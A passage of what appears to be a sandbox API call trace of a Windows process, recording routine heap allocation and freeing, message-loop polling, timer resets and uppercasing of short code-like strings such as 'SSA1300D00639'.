0x24b17e8 [0267.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0267.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0267.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0267.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.366] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0267.368] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.368] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0267.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0267.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0267.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0267.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0267.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0267.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa430 [0267.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0267.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0267.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0267.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0267.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.374] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0267.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.374] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0267.374] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0267.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0267.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.374] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0267.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.375] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0267.375] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.375] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.379] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0267.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0267.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.380] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0267.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.381] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.381] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0267.381] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.381] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa838 [0267.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.382] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0267.382] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0267.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0267.383] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0267.383] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.384] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0267.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0267.385] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.385] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 1 [0267.385] TranslateMessage (lpMsg=0x8bf250) returned 0 [0267.385] DispatchMessageW (lpMsg=0x8bf250) returned 0x0 [0267.385] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0267.385] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0267.386] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0267.386] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.386] HeapFree (in: hHeap=0x25c0000, 